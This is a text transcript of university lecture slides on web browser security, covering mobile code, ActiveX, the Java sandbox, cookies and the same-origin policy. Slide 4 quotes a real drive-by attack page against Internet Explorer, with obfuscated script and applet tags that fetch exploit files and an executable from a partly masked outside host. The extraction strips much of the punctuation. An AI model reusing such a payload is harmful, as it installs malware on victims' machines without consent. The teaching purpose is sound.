Information Security CS 526 Lecture 31 - PowerPoint PPT Presentation

1 / 35

About This Presentation

Title:

Information Security CS 526 Lecture 31

Description:

Browsers communicate with the network and are complicated (i.e., buggy) software ... VBScript. similar to Javascript, only for Windows. Java applets ... – PowerPoint PPT presentation

Number of Views:88

Avg rating:3.0/5.0

Slides: 36

Provided by: NINGH7

Category:

more less

Transcript and Presenter's Notes

Title: Information Security CS 526 Lecture 31

1
Information Security CS 526Lecture 31

Web Browser Security Issues

2
Overview of Browser Security Issues

Browsers communicate with the network and are
complicated (i.e., buggy) software
Browsers are ubiquitous
Browsers do not subject to perimeter protection
Browsers have many, many extensions
Browsers run mobile code
to support active contents
Users use browsers to conduct critical
transactions
browsers interact users users trust browsers
Browsers maintain a lot of sensitive data

3
Browser and Network
Network
request
Browser
Web site
reply
OS
Hardware

Browser sends requests
May reveal private information (in forms,
cookies)
Browser receives information, code
May corrupt state by running unsafe code
Interaction susceptible to network attacks
Use HTTPS, which uses SSL/TLS

4
An Attack Incident Against IE Browser

One Click on a malicious URL
http//xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
Result

lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/sp
loit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt try document.writ
e('ltobject data10911545105116115
58 109104116109108581021051081
0158 //C\fo''o.mht!''http//vxxxx''xxe.biz/
/adv''erts//033//targ.ch' 'm/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgt lt/bodygtlt/htmlgt
MS05-002
MS03-011
MS04-013
5
An Attack Incident Against IE Browser
22 unwanted programs are installed without the
users consent
6
Vulnerabilities in Browsers (According to
Symantec Data)
7
Browser Are Extensible

Browser Plugins
e.g., Acrobat, Adobe Flash, Applu QuickTime, MS
Windows Media Player, Mozilla browser extensions,
Opera Widgets, Sun Java
Active X
allows applications or parts of applications to
be utilized by the web browser
applications have full access to operating
systems
web pages can use/download active X components

8
Browser Plugin Vulnerabilities
9
Browsers Support Active Contents

Javascript
embedded in web pages and executed inside browser
VBScript
similar to Javascript, only for Windows
Java applets
small pieces of Java bytecodes that execute in
browsers

10
Java Applet

Local window
Download
Seat map
Airline data
Local data
User profile
Credit card
Transmission
Select seat
Encrypted msg

11
HTML and Scripting

lthtmlgt
ltPgt
ltscriptgt
var num1, num2, sum
num1 prompt("Enter first number")
num2 prompt("Enter second number")
sum parseInt(num1) parseInt(num2)
alert("Sum " sum)
lt/scriptgt
lt/htmlgt

Browser receives content, displays HTML and
executes scripts
12
Document object model (DOM)

Object-oriented interface used to read and write
web page documents
Examples
Properties document.alinkColor, document.URL,
document.forms , document.links ,
document.anchors
Methods document.write(document.referrer)

13
Security risks posted by mobile code

Compromise host
Write to file system
Interfere with other processes in browser
environment
Steal information
Read file system
Read information associated with other browser
processes (e.g., other windows)
Fool the user

14
Need for session state in Browsers
www.e_buy.com
www.e_buy.com/ shopping.cfm? pID269 item1102030
405
View Catalog
Check out
Select Item
www.e_buy.com/ shopping.cfm? pID269
www.e_buy.com/ checkout.cfm? pID269 item1102030
405
Store session information in URL Easily read on
network
15
Store info across sessions?

Cookies
A cookie is a file created by an Internet site to
store information on your computer

Enters form data
Server
Browser
Stores cookie
Requests cookie
Server
Browser
Returns data
Http is stateless protocol cookies add state
16
Cookie

A named text string stored by the browser
Accessible as property of the Document object
Can be read and written entirely on client side
using Javascript
used for authenticating, tracking, and
maintaining specific information about users
e.g., site preferences, contents of shopping
carts
data may be sensitive
may be used to gather information about specific
users

17
Security/Privacy Issues in Web Browsers

How to securely run mobile code?
How to provide access control to cookies and DOM
objects?
How to deal with privacy risks?

18
Approaches to run Mobile Code

Sandboxing
Code executed in browser has only restricted
access to OS, network
Isolation the same-origin principle
Only the site that stores some information in the
browser may later read or modify that information
(or depend on it in any way).
Establish trust in the code
code digitally signed

19
Security Mechanisms for Effective Sandboxing

Examine code before executing
Java bytecode verifier performs critical tests
Interpret code and trap risky operations
Java bytecode interpreter does run-time tests
Security manager applies local access policy
Security manager policy based on
Site that suppplied the code
Code signing who signed it?

20
Java Virtual Machine Architecture
A.class
A.java
Java Compiler
Compile source code
Java Virtual Machine
Loader
Network
B.class
Verifier
Linker
Bytecode Interpreter
21
ActiveX

ActiveX controls reside on client's machine,
activated by HTML object tag on the page
ActiveX controls are not interpreted by browser
Compiled binaries executed by client OS
Controls can be downloaded and installed
Security model relies on three components
Digital signatures to verify source of binary
AuthentiCode
IE policy can reject controls from network zones
Controls marked by author as safe for
initialization, safe for scripting which affects
the way control used
Once accepted, installed and started, no control
over execution

22
Installing Controls
If you install and run, no further control over
the code.
In principle, browser/OS could apply sandboxing,
other techniques for containing risks in native
code. But dont count on it.
23
Risks associated with controls

MSDN Warning
An ActiveX control can be an extremely insecure
way to provide a feature
Many have suggested disabling ActiveX
Why?
It can do any user action
read and write Windows registry
access the local file system
Other web pages can attack a control
Once installed, control can be accessed by any
page
Page only needs to know class identifier (CLSID)
Recommendation use other means if possible

http//msdn.microsoft.com/library/default.asp?url
/code/list/ie.asp
24
IE Browser Helper Objects (Extensions)

COM components loaded when IE starts up
Run in same memory context as the browser
Perform any action on IE windows and modules
Detect browser events
GoBack, GoForward, and DocumentComplete
Access browser menu, toolbar and make changes
Create windows to display additional information
Install hooks to monitor messages and actions
Summary No protection from extensions

http//msdn.microsoft.com/library/default.asp?url
/library/en-us/dnwebgen/html/bho.asp
25
Javascript Security Model

Sandbox design (at least conceptually)
No direct file access or network access
Same-origin policy
Can only read properties of documents and windows
from same place server, protocol, port
Access control with signed scripts
User can grant privileges to signed scripts
UniversalBrowserRead/Write
UniversalFileread,
UniversalSendMail

Reference http//www.devarticles.com/c/a/JavaScri
pt/JavaScript-Security/
26
Same Original Policy

Applies to scripts that run in browsers
Origin domain name protocol port
all three must be equal for origin to be
considered the same
however, some access allowed for pages from same
domain, but not same host

27
Examples, assuming www.example.com
Same-origin check applies to access to window
object of other frames, etc.
28
Same Original Policy Accesses it Controls

Same-origin policy applies to the following
accesses
manipulating browser windows
URLs requested via the XmlHttpRequest
XmlHttpRequest is an API that can be used by web
browser scripting languages to transfer XML and
other text data to and from a web server using
HTTP, by establishing an independent and
asynchronous communication channel.
used by AJAX
manipulating frames (including inline frames)
manipulating documents (included using the object
tag)
manipulating cookies

29
Threats Same-Origin Policy Intends to Deal with

Impersonation of a Legitimate User (Session
Hijacking)
violating the trust a website places in a remote
user, allowing the attacker to initiate HTTP
requests in the context of the remote user or
impersonate the remote user entirely.
Impersonation of a Legitimate Website (Phishing)
violating the trust a user places in a remote
site by impersonating the site in whole or in
part.

30
Same Original Policy Exceptions, Issues, and
Workarounds

Parent Domain Traversal
x.y.com can set its domain to y.com
becomes problematic with international domains
consider co.uk
Use Flash browser plugins
allow cross-domain requests if allowed by a rule
in crossdomain.xml
Many vulnerabilities

31
Problems with S-O Principle

Poorly enforced on some browsers
Particularly older browsers
Limitations if site hosts unrelated pages
Example Web server often hosts sites for
unrelated parties
http//www.example.com/account/
http//www.example.com/otheraccount/
Same-origin policy, allows script on one page to
access properties of document from another
Can be bypassed in Cross-Site-Scripting attacks

32
Browser Cookie Management

Cookie Same-origin ownership
Once a cookie is saved on your computer, only the
Web site that created the cookie can read it.
Variations
Temporary cookies
Stored until you quit your browser
Persistent cookies
Remain until deleted or expire
Third-party cookies
Originates on or sent to a web site other than
the one that provided the current page

33
Third-party cookies